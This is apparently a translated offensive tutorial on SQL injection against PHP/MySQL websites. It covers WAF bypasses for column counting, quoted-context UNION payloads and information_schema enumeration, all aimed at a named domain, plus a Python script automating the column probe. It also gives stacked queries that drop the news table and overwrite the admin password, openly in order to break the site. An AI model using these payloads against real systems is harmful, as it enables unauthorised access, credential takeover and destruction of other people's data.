Taking PHP as an example
The main reason SQL injection fails is the WAF and hand-written protection code. A WAF is there to intercept malicious requests, but a WAF is easily bypassed: its rules are fixed, and the attacker is not. A WAF sits on the server side, filters HTTP requests against a predefined rule set, and blocks the common, well-known XSS and SQL injection payloads, which is exactly why anything outside that rule set gets through.
Is the ORDER BY statement blocked?
This rarely happens, but sometimes a WAF blocks ORDER BY for whatever reason. We can bypass it with a simple trick: use GROUP BY instead. MySQL accepts a column position in GROUP BY just as it does in ORDER BY, and errors when the position exceeds the number of columns, so it works as a column-count probe, and GROUP BY is usually not in the WAF rule list.
For example, the following request gets a 403 Forbidden:
Http://www.8090sec.com/gallery?id=1 ORDER by 100-- so we try GROUP BY instead:
Http://www.8090sec.com/gallery?id=1 GROUP BY 100-- and it succeeds.
However, that may also be intercepted. In that case we use a statement that is not so widely circulated:
(main query statement) = (select 1)
Http://www.8090sec.com/news.php?id=8 and (SELECT * from admins) = (select 1)
The page returns an error similar to Operand should contain 5 column(s).
So we know the query has 5 columns. This needs a table name that actually exists (here admins) and a page that shows the database error; without the error text there is nothing to read.
From there the UNION SELECT follows naturally:
Http://www.8090sec.com/news.php?id=-8 Union Select 1,2,3,4,5--
ORDER BY 10000 still gives no error?
A note on a different case: sometimes ORDER BY is not blocked, yet even ORDER BY 10000 produces no error. This is different from the previous section. There the request was intercepted by the WAF; here the injection statement itself is the problem. When I first met this, I naively thought the table really had 10000 columns. The answer is simple: ORDER BY 1000000 returns no error because our injected statement is not being executed at all.
Http://www.8090sec.com/news.php?id=9 ORDER by 10000000000-- no error
Let's change the URL a little: add a single quote after the id, and add --+ at the end (the + decodes to the space MySQL requires after --). The id is being placed inside a string literal in the query, so the quote closes that string, the ORDER BY becomes real SQL, and the comment swallows the application's trailing quote.
Http://www.8090sec.com/news.php?id=9 ' ORDER by 10000000--+ error
Then start the UNION query in the same way, keeping the quote and the comment:
Http://www.8090sec.com/news.php?id=-9 ' Union Select 1,2,3,4,5,6,7,8--+
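The column-count probe described above, including the ORDER BY / GROUP BY choice and the numeric-versus-quoted context that makes a huge ORDER BY "silently succeed", as an added example that is not part of the original post. It uses an in-memory SQLite database with a constructed 5-column news table as a stand-in for the MySQL target; both engines raise an error for an out-of-range ORDER BY or GROUP BY position (the message differs: MySQL says Unknown column in 'order clause'), and both treat `--` as a line comment. The two query functions reproduce the vulnerable PHP concatenation patterns (`id=` . $id versus `id='` . $id . `'`), which are assumptions about the application, not its code.

```python
import sqlite3

# Constructed sample schema standing in for the target's news table.
# The probe is supposed to recover its column count (5).
SCHEMA = """
CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT, posted TEXT);
INSERT INTO news VALUES (9, 'hello', 'world', 'admin', '2012-01-01');
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def query_numeric(db, id_param):
    # Assumed app pattern: "SELECT * FROM news WHERE id=" . $_GET['id']
    # The parameter lands directly in SQL, so ORDER BY n is executed as written.
    return db.execute("SELECT * FROM news WHERE id=" + id_param).fetchall()


def query_quoted(db, id_param):
    # Assumed app pattern: "SELECT * FROM news WHERE id='" . $_GET['id'] . "'"
    # Without a closing quote the payload stays inside the string literal.
    return db.execute("SELECT * FROM news WHERE id='" + id_param + "'").fetchall()


def probe_errors(db, runner, payload):
    """True if the database rejected the query built from this payload."""
    try:
        runner(db, payload)
        return False
    except sqlite3.OperationalError:
        return True


def count_columns(db, runner, prefix, suffix, keyword="ORDER BY", limit=64):
    """Binary-search the column count with '<keyword> n'.

    prefix/suffix are the pieces that make the payload valid SQL in the
    target context, e.g. ("9", "") for a numeric id and ("9'", "-- ") for a
    quoted one.  Returns the column count, or None when even '<keyword> limit'
    produces no error, which means the injected text is not running as SQL
    (the "ORDER BY 10000 still no error" situation), or when '<keyword> 1'
    already errors, which means the payload itself is malformed.
    """
    def errs(n):
        return probe_errors(db, runner, f"{prefix} {keyword} {n}{suffix}")

    if not errs(limit) or errs(1):
        return None
    lo, hi = 1, limit            # invariant: lo succeeds, hi errors
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if errs(mid):
            hi = mid
        else:
            lo = mid
    return lo


if __name__ == "__main__":
    db = make_db()
    print("numeric, ORDER BY :", count_columns(db, query_numeric, "9", ""))
    print("numeric, GROUP BY :", count_columns(db, query_numeric, "9", "", keyword="GROUP BY"))
    print("quoted, no quote  :", count_columns(db, query_quoted, "9", ""))
    print("quoted, 9'...-- :", count_columns(db, query_quoted, "9'", "-- "))
```

The third call is the trap from the text: the payload is swallowed by the string literal, nothing errors at any n, and the function reports None rather than a bogus huge column count. Adding the closing quote and the comment (the fourth call) turns the same probe into real SQL and the count comes back. The upper bound is kept at 64 because SQLite treats an ORDER BY integer that does not fit in 32 bits as an ordinary constant expression rather than a column position, so 10000000000 would not error there even in numeric context.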
Get data from other databases
Sometimes the injection succeeds, but the tables we read out are all news, album, article and so on, while what we want is the management or login table. That is when we need to check whether there are other databases on the server.
First get all the database names:
Http://www.8090sec.com/news.php?id=9 Union Select 1,2,group_concat(schema_name),4 from information_schema.schemata
Then get the tables of the chosen database:
Http://www.8090sec.com/news.php?id=9 Union Select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=(hex encoding of the database name)
And then all of its columns, which live in information_schema.columns, not information_schema.tables:
Http://www.8090sec.com/news.php?id=9 Union Select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=(hex encoding of the database name) and table_name=(hex encoding of the table name)
The names are written as MySQL hex literals (0x followed by the hex bytes of the name) so that no quotes appear in the URL, which both avoids the WAF and survives PHP's magic_quotes escaping of single quotes.
Can I modify the information in the database through SQL injection?
SQL can query, update and insert data, so reading data is only one of its uses. Sometimes the MD5 of the administrator password cannot be cracked, so why not add an account of your own with an INSERT statement? If you cannot find the admin backend at all and want to be nasty, simply drop the whole table so the administrator cannot log in either and the site is broken. You can also change the administrator password with an UPDATE statement.
Http://www.8090sec.com/news.php?id=1
Suppose there is an injection here.
We got some table names through UNION, say news, so we delete the news table with the following statement:
http://www.8090sec.com/news.php?id=1; DROP TABLE News
Then all the news content on the site is gone. If you want to change the administrator password instead:
http://www.8090sec.com/news.php?id=1; UPDATE `admin_login` SET `password`='your own MD5' WHERE login_name='admin'--
Note that these are stacked queries: the second statement after the semicolon only runs if the application's database API allows several statements in one call (for example mysqli_multi_query() or PDO with emulated prepares). The classic PHP mysql_query() and mysqli_query() execute a single statement and reject the rest, so on many PHP sites these two payloads fail even though a UNION injection works.